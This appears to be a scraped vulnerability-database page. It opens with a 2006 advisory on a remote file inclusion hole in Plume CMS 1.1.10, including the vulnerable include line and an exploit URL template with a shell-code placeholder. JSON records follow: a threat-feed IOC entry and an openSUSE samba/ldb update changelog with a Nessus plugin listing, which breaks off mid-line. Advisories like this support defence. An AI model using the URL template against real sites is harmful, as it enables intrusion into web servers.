ID SECURITYVULNS:DOC:14327
Type securityvulns
Reporter Securityvulns
Modified 2006-09-19T00:00:00
Description
Vendor: Plume CMS 1.1.10
Found By : D3nGeR
Scripit Site : http://plume-cms.net
in file [prepend.php]
;
include_once $_PX_config['manager_path'].'/inc/class.config.php'
code
http://site.com/[path]manager/frontinc/prepend.php?_PX_config[manager_path]=[shell code ]
{"id": "SECURITYVULNS:DOC:14327", "bulletinFamily": "software", "title": "Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability", "description": "Vendor: Plume CMS 1.1.10\r\nFound By : D3nGeR\r\nScripit Site : http://plume-cms.net\r\n\r\nin file [prepend.php]\r\n\r\n;\r\ninclude_once $_PX_config['manager_path'].'/inc/class.config.php'\r\n\r\ncode\r\nhttp://site.com/[path]manager/frontinc/prepend.php?_PX_config[manager_path]=[shell code ]", "published": "2006-09-19T00:00:00", "modified": "2006-09-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14327", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:19", "edition": 1, "viewCount": 6, "enchantments": {"score": {"value": 2.8, "vector": "NONE", "modified": "2018-08-31T11:10:19", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB3023167", "KB2880833", "KB953334", "KB2874216", "KB3209587", "KB981401", "KB2788321", "KB2510690", "KB2785908", "KB955430"]}, {"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_D887B3D9736611EAB81A001CC0382B2F.NASL", "FREEBSD_PKG_090763F6703011EA93DD080027846A02.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "freebsd", "idList": ["D887B3D9-7366-11EA-B81A-001CC0382B2F"]}, {"type": "zdt", "idList": ["1337DAY-ID-34154", "1337DAY-ID-34158", "1337DAY-ID-34157"]}], "modified": "2018-08-31T11:10:19", "rev": 2}, "vulnersScore": 2.8}, "affectedSoftware": []}
{"rst": [{"lastseen": "2020-01-05T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **23[.]227.186.130** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-01-05T03:00:00, Last seen: 2020-01-05T03:00:00.\n IOC tags: **generic**.\nASN 54540: (First IP 23.227.183.0, Last IP 23.227.186.255).\nASN Name \"INCERO\" and Organisation \"Incero LLC\".\nASN hosts 14327 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-01-05T00:00:00", "id": "RST:76713A84-2283-3428-8170-522466511120", "href": "", "published": "2020-12-06T00:00:00", "title": "RST Threat feed. IOC: 23.227.186.130", "type": "rst", "cvss": {}}], "nessus": [{"lastseen": "2020-09-14T17:10:35", "description": "This update for ldb, samba fixes the following issues :\n\nChanges in samba :\n\n - Update to samba 4.11.11\n\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server\n when ASQ and VLV combined; (bso#14364); (bsc#1173159]\n\n + CVE-2020-10745: invalid DNS or NBT queries containing\n dots use several seconds of CPU each; (bso#14378);\n (bsc#1173160).\n\n + CVE-2020-10760: Use-after-free in AD DC Global Catalog\n LDAP server with paged_result or VLV; (bso#14402);\n (bsc#1173161)\n\n + CVE-2020-14303: Endless loop from empty UDP packet sent\n to AD DC nbt_server; (bso#14417); (bsc#1173359).\n\n - Update to samba 4.11.10\n\n + Fix segfault when using SMBC_opendir_ctx() routine for\n share folder that contains incorrect symbols in any file\n name; (bso#14374).\n\n + vfs_shadow_copy2 doesn't fail case looking in\n snapdirseverywhere mode; (bso#14350)\n\n + ldb_ldap: Fix off-by-one increment in lldb_add_msg_attr;\n (bso#14413).\n\n + Malicous SMB1 server can crash libsmbclient; (bso#14366)\n\n + winbindd: Fix a use-after-free when winbind clients\n exit; (bso#14382)\n\n + ldb: Bump version to 2.0.11, LMDB databases can grow\n without bounds. (bso#14330)\n\n - Update to samba 4.11.9\n\n + nmblib: Avoid undefined behaviour in handle_name_ptrs();\n (bso#14242).\n\n + 'samba-tool group' commands do not handle group names\n with special chars correctly; (bso#14296).\n\n + smbd: avoid calling vfs_file_id_from_sbuf() if statinfo\n is not valid; (bso#14237).\n\n + Missing check for DMAPI offline status in async DOS\n attributes; (bso#14293).\n\n + smbd: Ignore set NTACL requests which contain S-1-5-88\n NFS ACEs; (bso#14307).\n\n + vfs_recycle: Prevent flooding the log if we're called on\n non-existent paths; (bso#14316)\n\n + smbd mistakenly updates a file's write-time on close;\n (bso#14320).\n\n + RPC handles cannot be differentiated in source3 RPC\n server; (bso#14359).\n\n + librpc: Fix IDL for svcctl_ChangeServiceConfigW;\n (bso#14313).\n\n + nsswitch: Fix use-after-free causing segfault in\n _pam_delete_cred; (bso#14327).\n\n + Fix fruit:time machine max size on arm; (bso#13622)\n\n + CTDB recovery corner cases can cause record resurrection\n and node banning; (bso#14294).\n\n + ctdb: Fix a memleak; (bso#14348).\n\n + libsmb: Don't try to find posix stat info in\n SMBC_getatr().\n\n + ctdb-tcp: Move free of inbound queue to TCP restart;\n (bso#14295); (bsc#1162680).\n\n + s3/librpc/crypto: Fix double free with unresolved\n credential cache; (bso#14344); (bsc#1169095)\n\n + s3:libads: Fix ads_get_upn(); (bso#14336).\n\n + CTDB recovery corner cases can cause record resurrection\n and node banning; (bso#14294)\n\n + Starting ctdb node that was powered off hard before\n results in recovery loop; (bso#14295); (bsc#1162680).\n\n + ctdb-recoverd: Avoid dereferencing NULL rec->nodemap;\n (bso#14324)\n\n - Update to samba 4.11.8\n\n + CVE-2020-10700: Use-after-free in Samba AD DC LDAP\n Server with ASQ; (bso#14331); (bsc#1169850);\n\n + CVE-2020-10704: LDAP Denial of Service (stack overflow)\n in Samba AD DC; (bso#14334); (bsc#1169851);\n\n - Update to samba 4.11.7\n\n + s3: lib: nmblib. Clean up and harden nmb packet\n processing; (bso#14239).\n\n + s3: VFS: full_audit. Use system session_info if called\n from a temporary share definition; (bso#14283)\n\n + dsdb: Correctly handle memory in objectclass_attrs;\n (bso#14258).\n\n + ldb: version 2.0.9, Samba 4.11 and later give incorrect\n results for SCOPE_ONE searches; (bso#14270)\n\n + auth: Fix CIDs 1458418 and 1458420 NULL pointer\n dereferences; (bso#14247).\n\n + smbd: Handle EINTR from open(2) properly; (bso#14285)\n\n + winbind member (source3) fails local SAM auth with empty\n domain name; (bso#14247)\n\n + winbindd: Handling missing idmap in getgrgid();\n (bso#14265).\n\n + lib:util: Log mkdir error on correct debug levels;\n (bso#14253).\n\n + wafsamba: Do not use 'rU' as the 'U' is deprecated in\n Python 3.9; (bso#14266).\n\n + ctdb-tcp: Make error handling for outbound connection\n consistent; (bso#14274).\n\n - Update to samba 4.11.6\n\n + pygpo: Use correct method flags; (bso#14209).\n\n + vfs_ceph_snapshots: Fix root relative path handling;\n (bso#14216); (bsc#1141320).\n\n + Avoiding bad call flags with python 3.8, using\n METH_NOARGS instead of zero; (bso#14209).\n\n + source4/utils/oLschema2ldif: Include stdint.h before\n cmocka.h; (bso#14218).\n\n + docs-xml/winbindnssinfo: Clarify interaction with\n idmap_ad etc; (bso#14122).\n\n + smbd: Fix the build with clang; (bso#14251).\n\n + upgradedns: Ensure lmdb lock files linked; (bso#14199).\n\n + s3: VFS: glusterfs: Reset nlinks for symlink entries\n during readdir; (bso#14182).\n\n + smbc_stat() doesn't return the correct st_mode and also\n the uid/gid is not filled (SMBv1) file; (bso#14101).\n\n + librpc: Fix string length checking in\n ndr_pull_charset_to_null(); (bso#14219).\n\n + ctdb-scripts: Strip square brackets when gathering\n connection info; (bso#14227).\n\n - Add libnetapi-devel to baselibs conf, for wine usage;\n (bsc#1172307);\n\n - Installing: samba - samba-ad-dc.service does not exist\n and unit not found; (bsc#1171437);\n\n - Fix samba_winbind package is installing python3-base\n without python3 package; (bsc#1169521);\n\nChanges in ldb :\n\n - Update to version 2.0.12\n\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server\n when ASQ and VLV combined; (bso#14364); (bsc#1173159).\n\n + ldb_ldap: fix off-by-one increment in lldb_add_msg_attr;\n (bso#14413).\n\n + lib/ldb: add unit test for ldb_ldap internal code.\n\n - Update to version 2.0.11\n\n + lib ldb: lmdb init var before calling mdb_reader_check.\n\n + lib ldb: lmdb clear stale readers on write txn start;\n (bso#14330).\n\n + ldb tests: Confirm lmdb free list handling\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update\nproject.", "edition": 3, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2020-09-02T00:00:00", "title": "openSUSE Security Update : ldb / samba (openSUSE-2020-1313)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-10700", "CVE-2020-10730", "CVE-2020-10760", "CVE-2020-14303", "CVE-2020-10704", "CVE-2020-10745"], "modified": "2020-09-02T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda", "p-cpe:/a:novell:opensuse:python3-ldb-debuginfo", "p-cpe:/a:novell:opensuse:libldb-devel", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python3", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:opensuse:python3-ldb-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libldb2", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:samba-python3", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:ldb-tools", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-ad-dc", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo", "p-cpe:/a:novell:opensuse:ldb-debugsource", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:samba-ceph", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel", "p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libsamba-errors0", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:python3-ldb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:python3-ldb", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-dsdb-modules", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:ldb-tools-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libldb2-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "p-cpe:/a:novell:opensuse:libsamdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:python3-ldb-32bit", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:libsamba-errors-devel", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libldb2-32bit", "p-cpe:/a:novell:opensuse:libsmbldap2", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:samba-ceph-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libldb2-32bit-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:samba-python3-debuginfo", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit"], "id": "OPENSUSE-2020-1313.NASL", "href": "https://www.tenable.com/plugins/nessus/140174", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1313.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(140174);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2020-10700\", \"CVE-2020-10704\", \"CVE-2020-10730\", \"CVE-2020-10745\", \"CVE-2020-10760\", \"CVE-2020-14303\");\n\n script_name(english:\"openSUSE Security Update : ldb / samba (openSUSE-2020-1313)\");\n script_summary(english:\"Check for the openSUSE-2020-1313 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for ldb, samba fixes the following issues :\n\nChanges in samba :\n\n - Update to samba 4.11.11\n\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server\n when ASQ and VLV combined; (bso#14364); (bsc#1173159]\n\n + CVE-2020-10745: invalid DNS or NBT queries containing\n dots use several seconds of CPU each; (bso#14378);\n (bsc#1173160).\n\n + CVE-2020-10760: Use-after-free in AD DC Global Catalog\n LDAP server with paged_result or VLV; (bso#14402);\n (bsc#1173161)\n\n + CVE-2020-14303: Endless loop from empty UDP packet sent\n to AD DC nbt_server; (bso#14417); (bsc#1173359).\n\n - Update to samba 4.11.10\n\n + Fix segfault when using SMBC_opendir_ctx() routine for\n share folder that contains incorrect symbols in any file\n name; (bso#14374).\n\n + vfs_shadow_copy2 doesn't fail case looking in\n snapdirseverywhere mode; (bso#14350)\n\n + ldb_ldap: Fix off-by-one increment in lldb_add_msg_attr;\n (bso#14413).\n\n + Malicous SMB1 server can crash libsmbclient; (bso#14366)\n\n + winbindd: Fix a use-after-free when winbind clients\n exit; (bso#14382)\n\n + ldb: Bump version to 2.0.11, LMDB databases can grow\n without bounds. (bso#14330)\n\n - Update to samba 4.11.9\n\n + nmblib: Avoid undefined behaviour in handle_name_ptrs();\n (bso#14242).\n\n + 'samba-tool group' commands do not handle group names\n with special chars correctly; (bso#14296).\n\n + smbd: avoid calling vfs_file_id_from_sbuf() if statinfo\n is not valid; (bso#14237).\n\n + Missing check for DMAPI offline status in async DOS\n attributes; (bso#14293).\n\n + smbd: Ignore set NTACL requests which contain S-1-5-88\n NFS ACEs; (bso#14307).\n\n + vfs_recycle: Prevent flooding the log if we're called on\n non-existent paths; (bso#14316)\n\n + smbd mistakenly updates a file's write-time on close;\n (bso#14320).\n\n + RPC handles cannot be differentiated in source3 RPC\n server; (bso#14359).\n\n + librpc: Fix IDL for svcctl_ChangeServiceConfigW;\n (bso#14313).\n\n + nsswitch: Fix use-after-free causing segfault in\n _pam_delete_cred; (bso#14327).\n\n + Fix fruit:time machine max size on arm; (bso#13622)\n\n + CTDB recovery corner cases can cause record resurrection\n and node banning; (bso#14294).\n\n + ctdb: Fix a memleak; (bso#14348).\n\n + libsmb: Don't try to find posix stat info in\n SMBC_getatr().\n\n + ctdb-tcp: Move free of inbound queue to TCP restart;\n (bso#14295); (bsc#1162680).\n\n + s3/librpc/crypto: Fix double free with unresolved\n credential cache; (bso#14344); (bsc#1169095)\n\n + s3:libads: Fix ads_get_upn(); (bso#14336).\n\n + CTDB recovery corner cases can cause record resurrection\n and node banning; (bso#14294)\n\n + Starting ctdb node that was powered off hard before\n results in recovery loop; (bso#14295); (bsc#1162680).\n\n + ctdb-recoverd: Avoid dereferencing NULL rec->nodemap;\n (bso#14324)\n\n - Update to samba 4.11.8\n\n + CVE-2020-10700: Use-after-free in Samba AD DC LDAP\n Server with ASQ; (bso#14331); (bsc#1169850);\n\n + CVE-2020-10704: LDAP Denial of Service (stack overflow)\n in Samba AD DC; (bso#14334); (bsc#1169851);\n\n - Update to samba 4.11.7\n\n + s3: lib: nmblib. Clean up and harden nmb packet\n processing; (bso#14239).\n\n + s3: VFS: full_audit. Use system session_info if called\n from a temporary share definition; (bso#14283)\n\n + dsdb: Correctly handle memory in objectclass_attrs;\n (bso#14258).\n\n + ldb: version 2.0.9, Samba 4.11 and later give incorrect\n results for SCOPE_ONE searches; (bso#14270)\n\n + auth: Fix CIDs 1458418 and 1458420 NULL pointer\n dereferences; (bso#14247).\n\n + smbd: Handle EINTR from open(2) properly; (bso#14285)\n\n + winbind member (source3) fails local SAM auth with empty\n domain name; (bso#14247)\n\n + winbindd: Handling missing idmap in getgrgid();\n (bso#14265).\n\n + lib:util: Log mkdir error on correct debug levels;\n (bso#14253).\n\n + wafsamba: Do not use 'rU' as the 'U' is deprecated in\n Python 3.9; (bso#14266).\n\n + ctdb-tcp: Make error handling for outbound connection\n consistent; (bso#14274).\n\n - Update to samba 4.11.6\n\n + pygpo: Use correct method flags; (bso#14209).\n\n + vfs_ceph_snapshots: Fix root relative path handling;\n (bso#14216); (bsc#1141320).\n\n + Avoiding bad call flags with python 3.8, using\n METH_NOARGS instead of zero; (bso#14209).\n\n + source4/utils/oLschema2ldif: Include stdint.h before\n cmocka.h; (bso#14218).\n\n + docs-xml/winbindnssinfo: Clarify interaction with\n idmap_ad etc; (bso#14122).\n\n + smbd: Fix the build with clang; (bso#14251).\n\n + upgradedns: Ensure lmdb lock files linked; (bso#14199).\n\n + s3: VFS: glusterfs: Reset nlinks for symlink entries\n during readdir; (bso#14182).\n\n + smbc_stat() doesn't return the correct st_mode and also\n the uid/gid is not filled (SMBv1) file; (bso#14101).\n\n + librpc: Fix string length checking in\n ndr_pull_charset_to_null(); (bso#14219).\n\n + ctdb-scripts: Strip square brackets when gathering\n connection info; (bso#14227).\n\n - Add libnetapi-devel to baselibs conf, for wine usage;\n (bsc#1172307);\n\n - Installing: samba - samba-ad-dc.service does not exist\n and unit not found; (bsc#1171437);\n\n - Fix samba_winbind package is installing python3-base\n without python3 package; (bsc#1169521);\n\nChanges in ldb :\n\n - Update to version 2.0.12\n\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server\n when ASQ and VLV combined; (bso#14364); (bsc#1173159).\n\n + ldb_ldap: fix off-by-one increment in lldb_add_msg_attr;\n (bso#14413).\n\n + lib/ldb: add unit test for ldb_ldap internal code.\n\n - Update to version 2.0.11\n\n + lib ldb: lmdb init var before calling mdb_reader_check.\n\n + lib ldb: lmdb clear stale readers on write txn start;\n (bso#14330).\n\n + ldb tests: Confirm lmdb free list handling\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1141320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1162680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169521\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169850\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169851\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171437\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172307\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1174120\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected ldb / samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ldb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ldb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ldb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", 